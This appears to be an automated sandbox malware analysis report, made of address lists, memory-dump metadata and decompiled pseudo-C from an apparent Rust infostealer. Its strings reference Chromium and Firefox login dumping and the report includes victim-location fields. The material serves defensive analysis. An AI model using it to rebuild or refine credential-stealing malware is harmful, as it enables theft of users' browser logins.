                                                                                          0x7ff768b85d9f
                                                                                          0x7ff768b85da7
                                                                                          0x7ff768b85daa
                                                                                          0x7ff768b85dbd
                                                                                          0x7ff768b85dd1
                                                                                          0x7ff768b85ddb
                                                                                          0x7ff768b85de0
                                                                                          0x7ff768b85de3
                                                                                          0x7ff768b85de8
                                                                                          0x7ff768b85e05
                                                                                          0x7ff768b85e12
                                                                                          0x7ff768b85e19
                                                                                          0x7ff768b85e1e
                                                                                          0x7ff768b85e26
                                                                                          0x7ff768b85e29
                                                                                          0x7ff768b85e2d
                                                                                          0x7ff768b85e32
                                                                                          0x7ff768b85e37
                                                                                          0x7ff768b85e3a
                                                                                          0x7ff768b85e3e
                                                                                          0x7ff768b85e61
                                                                                          0x7ff768b85e6d
                                                                                          0x7ff768b85e78
                                                                                          0x7ff768b85e83
                                                                                          0x7ff768b85e90
                                                                                          0x7ff768b85ea4
                                                                                          0x7ff768b85ea9
                                                                                          0x7ff768b85eae
                                                                                          0x7ff768b85ecd
                                                                                          0x7ff768b85ed2
                                                                                          0x7ff768b85eda
                                                                                          0x7ff768b85ee2
                                                                                          0x7ff768b85ee5
                                                                                          0x7ff768b85ee8
                                                                                          0x7ff768b85efb
                                                                                          0x7ff768b85f0f
                                                                                          0x7ff768b85f19
                                                                                          0x7ff768b85f1e
                                                                                          0x7ff768b85f21
                                                                                          0x7ff768b85f26
                                                                                          0x7ff768b85f43
                                                                                          0x7ff768b85f50
                                                                                          0x7ff768b85f57
                                                                                          0x7ff768b85f5c
                                                                                          0x7ff768b85f64
                                                                                          0x7ff768b85f67
                                                                                          0x7ff768b85f6b
                                                                                          0x7ff768b85f70
                                                                                          0x7ff768b85f75
                                                                                          0x7ff768b85f78
                                                                                          0x7ff768b85f7c
                                                                                          0x7ff768b85f9f
                                                                                          0x7ff768b85fab
                                                                                          0x7ff768b85fb6
                                                                                          0x7ff768b85fc1
                                                                                          0x7ff768b85fce
                                                                                          0x7ff768b85fe2
                                                                                          0x7ff768b85fe7
                                                                                          0x7ff768b85fec
                                                                                          0x7ff768b8600a
                                                                                          0x7ff768b8600f
                                                                                          0x7ff768b86017
                                                                                          0x7ff768b8601f
                                                                                          0x7ff768b86023
                                                                                          0x7ff768b86025
                                                                                          0x7ff768b86038
                                                                                          0x7ff768b8604c
                                                                                          0x7ff768b86056
                                                                                          0x7ff768b8605b
                                                                                          0x7ff768b8605e
                                                                                          0x7ff768b86063
                                                                                          0x7ff768b86080
                                                                                          0x7ff768b8608d
                                                                                          0x7ff768b86094
                                                                                          0x7ff768b86099
                                                                                          0x7ff768b860a1
                                                                                          0x7ff768b860a4
                                                                                          0x7ff768b860a8
                                                                                          0x7ff768b860ad
                                                                                          0x7ff768b860b2
                                                                                          0x7ff768b860b5
                                                                                          0x7ff768b860b9
                                                                                          0x7ff768b860dc
                                                                                          0x7ff768b860e8
                                                                                          0x7ff768b860f3
                                                                                          0x7ff768b860fe
                                                                                          0x7ff768b8610b
                                                                                          0x7ff768b8611f
                                                                                          0x7ff768b86124
                                                                                          0x7ff768b86129
                                                                                          0x7ff768b86147
                                                                                          0x7ff768b8615e
                                                                                          0x7ff768b86163
                                                                                          0x7ff768b8616b
                                                                                          0x7ff768b86173
                                                                                          0x7ff768b86176
                                                                                          0x7ff768b8617c
                                                                                          0x7ff768b86180
                                                                                          0x7ff768b86193
                                                                                          0x7ff768b861a7
                                                                                          0x7ff768b861b1
                                                                                          0x7ff768b861b6
                                                                                          0x7ff768b861b9
                                                                                          0x7ff768b861be
                                                                                          0x7ff768b861db
                                                                                          0x7ff768b861e8
                                                                                          0x7ff768b861ef
                                                                                          0x7ff768b861f4
                                                                                          0x7ff768b861fc
                                                                                          0x7ff768b861ff
                                                                                          0x7ff768b86203
                                                                                          0x7ff768b86208
                                                                                          0x7ff768b8620d
                                                                                          0x7ff768b86210
                                                                                          0x7ff768b86214
                                                                                          0x7ff768b86237
                                                                                          0x7ff768b86243
                                                                                          0x7ff768b8624e
                                                                                          0x7ff768b86259
                                                                                          0x7ff768b86266
                                                                                          0x7ff768b8627a
                                                                                          0x7ff768b8627f
                                                                                          0x7ff768b86284
                                                                                          0x7ff768b862a1
                                                                                          0x7ff768b862a6
                                                                                          0x7ff768b862ae
                                                                                          0x7ff768b862b6
                                                                                          0x7ff768b862ba
                                                                                          0x7ff768b862bc
                                                                                          0x7ff768b862cf
                                                                                          0x7ff768b862e3
                                                                                          0x7ff768b862ed
                                                                                          0x7ff768b862f2
                                                                                          0x7ff768b862f5
                                                                                          0x7ff768b862fa
                                                                                          0x7ff768b86317
                                                                                          0x7ff768b86324
                                                                                          0x7ff768b8632b
                                                                                          0x7ff768b86330
                                                                                          0x7ff768b86338
                                                                                          0x7ff768b8633b
                                                                                          0x7ff768b8633f
                                                                                          0x7ff768b86344
                                                                                          0x7ff768b86349
                                                                                          0x7ff768b8634c
                                                                                          0x7ff768b86350
                                                                                          0x7ff768b86373
                                                                                          0x7ff768b8637f
                                                                                          0x7ff768b8638a
                                                                                          0x7ff768b86395
                                                                                          0x7ff768b863a2
                                                                                          0x7ff768b863b6
                                                                                          0x7ff768b863bb
                                                                                          0x7ff768b863c0
                                                                                          0x7ff768b863dd
                                                                                          0x7ff768b863e2
                                                                                          0x7ff768b863ea
                                                                                          0x7ff768b863f2
                                                                                          0x7ff768b863f6
                                                                                          0x7ff768b863f8
                                                                                          0x7ff768b8640b
                                                                                          0x7ff768b8641f
                                                                                          0x7ff768b86429
                                                                                          0x7ff768b8642e
                                                                                          0x7ff768b86431
                                                                                          0x7ff768b86436
                                                                                          0x7ff768b86453
                                                                                          0x7ff768b86460
                                                                                          0x7ff768b86467
                                                                                          0x7ff768b8646c
                                                                                          0x7ff768b86474
                                                                                          0x7ff768b86477
                                                                                          0x7ff768b8647b
                                                                                          0x7ff768b86480
                                                                                          0x7ff768b86485
                                                                                          0x7ff768b86488
                                                                                          0x7ff768b8648c
                                                                                          0x7ff768b864af
                                                                                          0x7ff768b864bb
                                                                                          0x7ff768b864c6
                                                                                          0x7ff768b864d1
                                                                                          0x7ff768b864de
                                                                                          0x7ff768b864f2
                                                                                          0x7ff768b864f7
                                                                                          0x7ff768b864fc
                                                                                          0x7ff768b8651a
                                                                                          0x7ff768b86531
                                                                                          0x7ff768b86536
                                                                                          0x7ff768b8653e
                                                                                          0x7ff768b86546
                                                                                          0x7ff768b86549
                                                                                          0x7ff768b8654f
                                                                                          0x7ff768b86553
                                                                                          0x7ff768b86566
                                                                                          0x7ff768b8657a
                                                                                          0x7ff768b86584
                                                                                          0x7ff768b86589
                                                                                          0x7ff768b8658c
                                                                                          0x7ff768b86591
                                                                                          0x7ff768b865ae
                                                                                          0x7ff768b865bb
                                                                                          0x7ff768b865c2
                                                                                          0x7ff768b865c7
                                                                                          0x7ff768b865cf
                                                                                          0x7ff768b865d2
                                                                                          0x7ff768b865d6
                                                                                          0x7ff768b865db
                                                                                          0x7ff768b865e0
                                                                                          0x7ff768b865e3
                                                                                          0x7ff768b865e7
                                                                                          0x7ff768b8660a
                                                                                          0x7ff768b86616
                                                                                          0x7ff768b86621
                                                                                          0x7ff768b8662c
                                                                                          0x7ff768b86639
                                                                                          0x7ff768b8664d
                                                                                          0x7ff768b86652
                                                                                          0x7ff768b86657
                                                                                          0x7ff768b8667c
                                                                                          0x7ff768b86681
                                                                                          0x7ff768b86689
                                                                                          0x7ff768b86691
                                                                                          0x7ff768b86694
                                                                                          0x7ff768b86697
                                                                                          0x7ff768b8669a
                                                                                          0x7ff768b866ad
                                                                                          0x7ff768b866c1
                                                                                          0x7ff768b866cb
                                                                                          0x7ff768b866d0
                                                                                          0x7ff768b866d3
                                                                                          0x7ff768b866d8
                                                                                          0x7ff768b866f5
                                                                                          0x7ff768b86702
                                                                                          0x7ff768b86709
                                                                                          0x7ff768b8670e
                                                                                          0x7ff768b86716
                                                                                          0x7ff768b86719
                                                                                          0x7ff768b8671d
                                                                                          0x7ff768b86722
                                                                                          0x7ff768b86727
                                                                                          0x7ff768b8672a
                                                                                          0x7ff768b8672e
                                                                                          0x7ff768b86751
                                                                                          0x7ff768b8675d
                                                                                          0x7ff768b86768
                                                                                          0x7ff768b86773
                                                                                          0x7ff768b86780
                                                                                          0x7ff768b86794
                                                                                          0x7ff768b86799
                                                                                          0x7ff768b8679e
                                                                                          0x7ff768b867b8
                                                                                          0x7ff768b867bd
                                                                                          0x7ff768b867c5
                                                                                          0x7ff768b867cd
                                                                                          0x7ff768b867d0
                                                                                          0x7ff768b867d2
                                                                                          0x7ff768b867e5

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap$memcpy
                                                                                          • String ID: LOCALAPPDATAsrc\chromium\dumper.rs$lumn out of bounds$rc\github.com-1ecc6299db9ec823\ctr-0.8.0\src\lib.rs$uplay\$}3i
                                                                                          • API String ID: 1887603139-1970448038
                                                                                          • Opcode ID: 8b9977b3230e58a752c803b41ab4cf52fee6b42f66737fd70a2f64eaf53dcdfd
                                                                                          • Instruction ID: 1148e274f925c3b9e0a5da2e4dd897db5c0856c27eccba74e41370a8fd3bf621
                                                                                          • Opcode Fuzzy Hash: 8b9977b3230e58a752c803b41ab4cf52fee6b42f66737fd70a2f64eaf53dcdfd
                                                                                          • Instruction Fuzzy Hash: 7AC37A72A18BC2C5E6619B14E4403EAF3A4FF88B94F849236EA9D03B95DF3CD185C754
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768B902EB Relevance: 111.3, APIs: 64, Strings: 8, Instructions: 3329memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap$memcpy$CloseHandle$FileFindNextmemcmpmemset
                                                                                          • String ID: ($APPDATAsrc\firefox\firefox.rs$`async fn` resumed after completionmissing field `$a Display implementation returned an error unexpectedly/rustc/d5a82bbd26e1ad8b7401f6a718a9c57c96905483\library\alloc\src\string.rs$already borrowed$called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value$logi$loginsstruct LoginFilestruct LoginFile with 1 element
                                                                                          • API String ID: 1696573445-691483592
                                                                                          • Opcode ID: d45c4e42d6a28bf9bfd75d11b5281f6a3b0eca96fb94c0411c7d0ba88b0b69c9
                                                                                          • Instruction ID: 793f18ba5796118cee1f2ff87dd156ce20ef48bf7194a93776d8c74f5f16adc9
                                                                                          • Opcode Fuzzy Hash: d45c4e42d6a28bf9bfd75d11b5281f6a3b0eca96fb94c0411c7d0ba88b0b69c9
                                                                                          • Instruction Fuzzy Hash: DF937F76A04BC1C9EB71AF25D8403ECB3A4FB49788F844236CA8D5BB59DF389685C354
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768B9EAE5 Relevance: 89.7, APIs: 31, Strings: 19, Instructions: 2212memorysynchronizationCOMMONCrypto
                                                                                          Download Yara Rule
                                                                                          C-Code - Quality: 77%
                                                                                          			E00007FF77FF768B9EAE5(void* __eax, void* __rdi, void* __r8, void* __r9, long long __r12, long long __r13, char* __r14) {
				void* _t341;
				void* _t344;
				void* _t351;
				void* _t358;
				void* _t369;
				void* _t384;
				signed char _t404;
				void* _t429;
				long long _t472;
				signed long long _t473;
				signed long long _t474;
				intOrPtr _t479;
				char* _t482;
				long long _t493;
				char* _t494;
				long long _t502;
				char* _t503;
				long long _t511;
				char* _t512;
				void* _t520;
				char* _t521;
				long long _t522;
				void* _t523;
				char* _t524;
				signed long long _t526;
				long long _t535;
				void* _t536;
				char* _t537;
				intOrPtr _t549;
				long long _t550;
				signed long long _t558;
				long long _t560;
				intOrPtr _t562;
				long long _t568;
				long long _t574;
				long long _t580;
				long long _t587;
				long long _t599;
				long long* _t604;
				signed long long* _t608;
				long long _t636;
				void* _t651;
				long long* _t652;
				long long* _t653;
				long long* _t654;
				long long* _t655;
				long long* _t656;
				char* _t657;
				signed long long _t660;
				char* _t661;
				long long* _t662;
				void* _t663;
				long long _t683;
				long long _t690;
				intOrPtr _t693;

				 *((intOrPtr*)(_t663 + 0x1e60)) =  *((intOrPtr*)(_t663 + 0x1e60)) - __eax;
				asm("movups [ebp+0x2578], xmm0");
				 *((long long*)(_t663 + 0x2570)) = __r12;
				 *((long long*)(_t663 + 0x2588)) = __r13;
				_t472 =  *((intOrPtr*)(_t663 + 0x2578));
				_t604 = _t663 + 0xd60;
				 *_t604 = __r12;
				 *((long long*)(_t663 + 0x2780)) = _t472;
				 *((long long*)(_t604 + 8)) = _t472;
				asm("xorps xmm0, xmm0");
				asm("movups [edx+0x10], xmm0");
				 *((long long*)(_t604 + 0x20)) = 1;
				 *((long long*)(_t604 + 0x28)) = 0;
				 *((char*)(_t604 + 0x30)) = 0x80;
				_t657 = _t663 + 0x22a0;
				E00007FF77FF768B72BF9(_t657, _t604, __r9);
				if ( *_t657 != 6) goto 0x68b9ebac;
				if ( *((long long*)(_t663 + 0xd78)) == 0) goto 0x68b9ec7c;
				HeapFree(??, ??, ??);
				goto 0x68b9ec7c;
				 *((intOrPtr*)(_t663 + 0x2690)) =  *((intOrPtr*)(_t663 + 0x1ab0));
				 *((intOrPtr*)(_t663 + 0x2693)) =  *((intOrPtr*)(_t663 + 0x1ab3));
				asm("movaps xmm0, [ebp+0x2110]");
				asm("movaps [ebp+0x1d50], xmm0");
				 *__r14 = 1;
				goto 0x68b9ed45;
				asm("movups xmm0, [ebp+0x22a0]");
				asm("movdqu xmm1, [ebp+0x22b0]");
				asm("movdqa [ebp+0x1e70], xmm1");
				asm("movaps [ebp+0x1e60], xmm0");
				_t473 =  *((intOrPtr*)(_t663 + 0xd68));
				_t549 =  *((intOrPtr*)(_t663 + 0xd70));
				if (_t549 - _t473 >= 0) goto 0x68b9ec24;
				_t474 =  ~_t473;
				_t550 = _t549 + 1;
				_t429 = __rdi - 0x20;
				if (_t429 > 0) goto 0x68babc55;
				asm("dec eax");
				if (_t429 >= 0) goto 0x68babc55;
				 *((long long*)(_t663 + 0xd70)) = _t550;
				if (_t474 + _t550 + 1 != 1) goto 0x68b9ebf4;
				 *((intOrPtr*)(_t663 + 0x1bd0)) =  *((intOrPtr*)(_t663 + 0x1e61));
				 *((intOrPtr*)(_t663 + 0x1bd3)) =  *((intOrPtr*)(_t663 + 0x1e64));
				asm("movaps xmm0, [ebp+0x1e70]");
				asm("movaps [ebp+0x22a0], xmm0");
				if ( *((long long*)(_t663 + 0xd78)) == 0) goto 0x68b9ec77;
				HeapFree(??, ??, ??);
				if ( *((intOrPtr*)(_t663 + 0x1e60)) != 6) goto 0x68b9ecd4;
				E00007FF77FF768BAD0E0();
				if (_t474 == 0) goto 0x68bac532;
				 *_t474 =  *((intOrPtr*)(_t663 + 0x1e68));
				E00007FF77FF768BAD0E0();
				if (_t474 == 0) goto 0x68bac5c7;
				_t660 = _t474;
				 *_t474 = _t474;
				 *((long long*)(_t660 + 8)) = 0x68e29ae8;
				 *((intOrPtr*)(_t660 + 0x28)) = 2;
				 *((short*)(_t660 + 0x68)) = 5;
				goto 0x68b9ecfa;
				 *((intOrPtr*)(_t663 + 0x1ab3)) =  *((intOrPtr*)(_t663 + 0x1bd3));
				 *((intOrPtr*)(_t663 + 0x1ab0)) =  *((intOrPtr*)(_t663 + 0x1bd0));
				asm("movaps xmm0, [ebp+0x22a0]");
				asm("movaps [ebp+0x2110], xmm0");
				 *((intOrPtr*)(__r13 + 0x10))();
				 *((intOrPtr*)(_t663 + 0x2690)) =  *((intOrPtr*)(_t663 + 0x1ab0));
				 *((intOrPtr*)(_t663 + 0x2693)) =  *((intOrPtr*)(_t663 + 0x1ab3));
				asm("movaps xmm0, [ebp+0x2110]");
				asm("movaps [ebp+0x1d50], xmm0");
				 *__r14 = 1;
				if (6 == 7) goto 0x68b9ea9f;
				 *((intOrPtr*)(_t663 + 0x210b)) =  *((intOrPtr*)(_t663 + 0x2693));
				 *((intOrPtr*)(_t663 + 0x2108)) =  *((intOrPtr*)(_t663 + 0x2690));
				asm("movaps xmm0, [ebp+0x1d50]");
				asm("movaps [ebp-0x10], xmm0");
				E00007FF77FF768B77B28( *((intOrPtr*)(_t663 + 0x2740)));
				if (6 == 6) goto 0x68bac2a6;
				_t661 =  *((intOrPtr*)(_t663 + 0x2778));
				 *_t661 = 6;
				 *((intOrPtr*)(_t661 + 1)) =  *((intOrPtr*)(_t663 + 0x2108));
				 *((intOrPtr*)(_t661 + 4)) =  *((intOrPtr*)(_t663 + 0x210b));
				 *(_t661 + 8) = _t660;
				asm("movaps xmm0, [ebp-0x10]");
				asm("movups [esi+0x10], xmm0");
				 *((long long*)(_t661 + 0x58)) = 0x68e29ae8;
				 *((long long*)(_t661 + 0x60)) = 8;
				 *(_t661 + 0x68) = 0x68e29ae8;
				_t651 = _t663 + 0x10;
				r8d = 8;
				_t341 = E00007FF77FF768C622D0(_t651);
				if ( *((char*)(_t651 + 0x18)) != 3) goto 0x68bac2bc;
				 *((long long*)(_t661 + 0x80)) =  *((intOrPtr*)(_t663 + 0x20));
				asm("movups xmm0, [ebp+0x10]");
				asm("movups [esi+0x70], xmm0");
				 *(_t663 + 0xd60) = 0x68dc4d3b;
				 *(_t663 + 0xd60) = 0xd3eee650;
				_t608 =  *(_t663 + 0xd60);
				E00007FF77FF768B7D08B(_t341, 8,  *(_t663 + 0xd60), _t608);
				r14d =  *0x930E9B7CD3EEE65C & 0x0000ffff;
				r14d = r14d ^ 0x00002894;
				dil = dil ^ 0x00000002;
				E00007FF77FF768BEFD87(0xd3eee650,  *(_t663 + 0xd60));
				 *_t608 = 0x24e4b4e8 ^  *0xd3eee650;
				_t608[1] = 0x82737ce3 ^  *0x930E9B7CD3EEE658;
				_t608[1] = r14w;
				_t608[1] = dil;
				 *((long long*)(_t663 + 0x2770)) = _t661 + 0x58;
				if ( *(_t661 + 0x68) !=  *((intOrPtr*)(_t661 + 0x58))) goto 0x68b9ee87;
				_t344 = E00007FF77FF768C51B93( *(_t661 + 0x68) -  *((intOrPtr*)(_t661 + 0x58)), _t661 + 0x58,  *(_t661 + 0x68),  *((intOrPtr*)(_t663 + 0x2780)));
				_t479 =  *((intOrPtr*)(_t661 + 0x60));
				_t558 =  *(_t661 + 0x68) +  *(_t661 + 0x68) * 2;
				 *((long long*)(_t479 + _t558 * 8)) = 0xd3eee650;
				 *(_t479 + 8 + _t558 * 8) = _t608;
				 *((long long*)(_t479 + 0x10 + _t558 * 8)) = 0xf;
				 *(_t661 + 0x68) =  *(_t661 + 0x68) + 1;
				 *(_t663 + 0xd60) = 0x68db8e71;
				 *(_t663 + 0xd60) = 0x1339b7e0;
				E00007FF77FF768B7C989(_t344, 8,  *(_t663 + 0xd60),  *(_t663 + 0xd60));
				_t100 = _t663 + 0x2110; // -196936464789613064
				_t560 = _t100;
				 *_t560 =  *0x1339b7e0 & 0x0000ffff ^ 0x0000140c;
				 *((long long*)(_t663 + 0x2570)) = _t560;
				 *((long long*)(_t663 + 0x2578)) = 2;
				E00007FF77FF768C5897D(0x68dc5648,  *(_t663 + 0xd60), _t661);
				_t482 =  ==  ? 0x68e2a988 : 0x1339b7e0;
				if ( *_t482 != 3) goto 0x68bac2e2;
				_t562 =  *((intOrPtr*)(_t482 + 0x10));
				if (_t562 == 0) goto 0x68bac2e2;
				_t105 = _t663 + 0x1e60; // -196936464789613752
				_t690 = _t105;
				 *_t690 = _t562;
				 *((long long*)(_t690 + 8)) =  *((intOrPtr*)(_t482 + 0x18));
				_t107 = _t663 + 0x2570; // -196936464789611944
				 *((long long*)(_t663 + 0x10)) = _t107;
				 *((long long*)(_t663 + 0x18)) = 0x68befcb0;
				 *((long long*)(_t663 + 0x20)) = _t690;
				 *((long long*)(_t663 + 0x28)) = 0x68befcb0;
				_t112 = _t663 + 0xd60; // -196936464789618104
				_t652 = _t112;
				 *_t652 = 0;
				 *((long long*)(_t652 + 0x10)) = 0x68e2d3e8;
				 *((long long*)(_t652 + 0x18)) = 0x68e2d3e8;
				_t115 = _t663 + 0x10; // -196936464789621512
				_t683 = _t115;
				 *((long long*)(_t652 + 0x20)) = _t683;
				 *((long long*)(_t652 + 0x28)) = 0x68e2d3e8;
				_t118 = _t663 + 0x22a0; // -196936464789612664
				E00007FF77FF768BB09E0(_t118, _t652);
				if ( *(_t661 + 0x68) !=  *((intOrPtr*)(_t661 + 0x58))) goto 0x68b9efc4;
				_t351 = E00007FF77FF768C51B93( *(_t661 + 0x68) -  *((intOrPtr*)(_t661 + 0x58)),  *((intOrPtr*)(_t663 + 0x2770)),  *(_t661 + 0x68), _t661);
				 *((long long*)( *((intOrPtr*)(_t661 + 0x60)) + 0x10 + ( *(_t661 + 0x68) +  *(_t661 + 0x68) * 2) * 8)) =  *((intOrPtr*)(_t663 + 0x22b0));
				asm("movups xmm0, [ebp+0x22a0]");
				asm("movups [eax+ecx*8], xmm0");
				 *(_t661 + 0x68) =  *(_t661 + 0x68) + 1;
				 *(_t663 + 0xd60) = 0x68dc038e;
				 *(_t663 + 0xd60) = 0x4335469f;
				E00007FF77FF768B7CA0A(_t351, 2,  *(_t663 + 0xd60),  *(_t663 + 0xd60));
				 *((char*)(_t663 + 0x2116)) = ( *0x763290B3433546A5 & 0x000000ff ^ 0x00000087) & 0x000000ff;
				 *(_t663 + 0x2110) = 0xc2514704;
				 *((short*)(_t663 + 0x2114)) =  *0x763290B3433546A3 & 0x0000ffff ^ 0x0000f9dc;
				_t141 = _t663 + 0x2110; // -196936464789613064
				_t493 = _t141;
				 *((long long*)(_t663 + 0x2570)) = _t493;
				 *((long long*)(_t663 + 0x2578)) = 7;
				E00007FF77FF768C5897D("country",  *(_t663 + 0xd60) << 0x00000030 ^  *(_t663 + 0xd60), _t661);
				_t494 =  ==  ? 0x68e2a988 : _t493;
				if ( *_t494 != 3) goto 0x68bac2f5;
				_t568 =  *((intOrPtr*)(_t494 + 0x10));
				if (_t568 == 0) goto 0x68bac2f5;
				 *((long long*)(_t663 + 0x1e60)) = _t568;
				 *((long long*)(_t663 + 0x1e68)) =  *((intOrPtr*)(_t494 + 0x18));
				_t148 = _t663 + 0x2570; // -196936464789611944
				 *((long long*)(_t663 + 0x10)) = _t148;
				 *((long long*)(_t663 + 0x18)) = 0x68befcb0;
				 *((long long*)(_t663 + 0x20)) = _t690;
				 *((long long*)(_t663 + 0x28)) = 0x68befcb0;
				_t153 = _t663 + 0xd60; // -196936464789618104
				_t653 = _t153;
				 *_t653 = 0;
				 *((long long*)(_t653 + 0x10)) = 0x68e2d3e8;
				 *((long long*)(_t653 + 0x18)) = 0x68e2d3e8;
				 *((long long*)(_t653 + 0x20)) = _t683;
				 *((long long*)(_t653 + 0x28)) = 0x68e2d3e8;
				_t158 = _t663 + 0x22a0; // -196936464789612664
				E00007FF77FF768BB09E0(_t158, _t653);
				if ( *(_t661 + 0x68) !=  *((intOrPtr*)(_t661 + 0x58))) goto 0x68b9f121;
				_t358 = E00007FF77FF768C51B93( *(_t661 + 0x68) -  *((intOrPtr*)(_t661 + 0x58)),  *((intOrPtr*)(_t663 + 0x2770)),  *(_t661 + 0x68), _t661);
				 *((long long*)( *((intOrPtr*)(_t661 + 0x60)) + 0x10 + ( *(_t661 + 0x68) +  *(_t661 + 0x68) * 2) * 8)) =  *((intOrPtr*)(_t663 + 0x22b0));
				asm("movups xmm0, [ebp+0x22a0]");
				asm("movups [eax+ecx*8], xmm0");
				 *(_t661 + 0x68) =  *(_t661 + 0x68) + 1;
				 *(_t663 + 0xd60) = 0x68dc2f44;
				 *(_t663 + 0xd60) = 0xc57550b9;
				E00007FF77FF768B7DC84(_t358, 7,  *(_t663 + 0xd60),  *(_t663 + 0xd60));
				 *(_t663 + 0x2110) = 0x1ff347fa ^  *0xc57550b9;
				_t176 = _t663 + 0x2110; // -196936464789613064
				_t502 = _t176;
				 *((long long*)(_t663 + 0x2570)) = _t502;
				 *((long long*)(_t663 + 0x2578)) = 4;
				E00007FF77FF768C5897D(0x68dc5688,  *(_t663 + 0xd60), _t661);
				_t503 =  ==  ? 0x68e2a988 : _t502;
				if ( *_t503 != 3) goto 0x68bac308;
				_t574 =  *((intOrPtr*)(_t503 + 0x10));
				if (_t574 == 0) goto 0x68bac308;
				 *((long long*)(_t663 + 0x1e60)) = _t574;
				 *((long long*)(_t663 + 0x1e68)) =  *((intOrPtr*)(_t503 + 0x18));
				_t183 = _t663 + 0x2570; // -196936464789611944
				 *((long long*)(_t663 + 0x10)) = _t183;
				 *((long long*)(_t663 + 0x18)) = 0x68befcb0;
				 *((long long*)(_t663 + 0x20)) = _t690;
				 *((long long*)(_t663 + 0x28)) = 0x68befcb0;
				_t188 = _t663 + 0xd60; // -196936464789618104
				_t654 = _t188;
				 *_t654 = 0;
				 *((long long*)(_t654 + 0x10)) = 0x68e2d3e8;
				 *((long long*)(_t654 + 0x18)) = 0x68e2d3e8;
				 *((long long*)(_t654 + 0x20)) = _t683;
				 *((long long*)(_t654 + 0x28)) = 0x68e2d3e8;
				_t193 = _t663 + 0x22a0; // -196936464789612664
				E00007FF77FF768BB09E0(_t193, _t654);
				if ( *(_t661 + 0x68) !=  *((intOrPtr*)(_t661 + 0x58))) goto 0x68b9f24c;
				E00007FF77FF768C51B93( *(_t661 + 0x68) -  *((intOrPtr*)(_t661 + 0x58)),  *((intOrPtr*)(_t663 + 0x2770)),  *(_t661 + 0x68), _t661);
				 *((long long*)( *((intOrPtr*)(_t661 + 0x60)) + 0x10 + ( *(_t661 + 0x68) +  *(_t661 + 0x68) * 2) * 8)) =  *((intOrPtr*)(_t663 + 0x22b0));
				asm("movups xmm0, [ebp+0x22a0]");
				asm("movups [eax+ecx*8], xmm0");
				 *(_t661 + 0x68) =  *(_t661 + 0x68) + 1;
				 *(_t663 + 0xd60) = 0x68dbfd42;
				 *(_t663 + 0xd60) = 0x2e35226d;
				E00007FF77FF768B7DBF1( *(_t663 + 0xd60));
				 *(_t663 + 0x2110) = 0xac8f6d92;
				 *((short*)(_t663 + 0x2114)) =  *0x3BF7FA642E352271 & 0x0000ffff ^ 0x0000ac8c;
				_t213 = _t663 + 0x2110; // -196936464789613064
				_t511 = _t213;
				 *((long long*)(_t663 + 0x2570)) = _t511;
				 *((long long*)(_t663 + 0x2578)) = 6;
				E00007FF77FF768C5897D("postal",  *(_t663 + 0xd60) ^  *(_t663 + 0xd60), _t661);
				_t512 =  ==  ? 0x68e2a988 : _t511;
				if ( *_t512 != 3) goto 0x68bac31b;
				_t580 =  *((intOrPtr*)(_t512 + 0x10));
				if (_t580 == 0) goto 0x68bac31b;
				 *((long long*)(_t663 + 0x1e60)) = _t580;
				 *((long long*)(_t663 + 0x1e68)) =  *((intOrPtr*)(_t512 + 0x18));
				_t220 = _t663 + 0x2570; // -196936464789611944
				 *((long long*)(_t663 + 0x10)) = _t220;
				 *((long long*)(_t663 + 0x18)) = 0x68befcb0;
				 *((long long*)(_t663 + 0x20)) = _t690;
				 *((long long*)(_t663 + 0x28)) = 0x68befcb0;
				_t225 = _t663 + 0xd60; // -196936464789618104
				_t655 = _t225;
				 *_t655 = 0;
				 *((long long*)(_t655 + 0x10)) = 0x68e2d3e8;
				 *((long long*)(_t655 + 0x18)) = 0x68e2d3e8;
				 *((long long*)(_t655 + 0x20)) = _t683;
				 *((long long*)(_t655 + 0x28)) = 0x68e2d3e8;
				_t230 = _t663 + 0x22a0; // -196936464789612664
				E00007FF77FF768BB09E0(_t230, _t655);
				if ( *(_t661 + 0x68) !=  *((intOrPtr*)(_t661 + 0x58))) goto 0x68b9f38a;
				_t369 = E00007FF77FF768C51B93( *(_t661 + 0x68) -  *((intOrPtr*)(_t661 + 0x58)),  *((intOrPtr*)(_t663 + 0x2770)),  *(_t661 + 0x68), _t661);
				 *((long long*)( *((intOrPtr*)(_t661 + 0x60)) + 0x10 + ( *(_t661 + 0x68) +  *(_t661 + 0x68) * 2) * 8)) =  *((intOrPtr*)(_t663 + 0x22b0));
				asm("movups xmm0, [ebp+0x22a0]");
				asm("movups [eax+ecx*8], xmm0");
				 *(_t661 + 0x68) =  *(_t661 + 0x68) + 1;
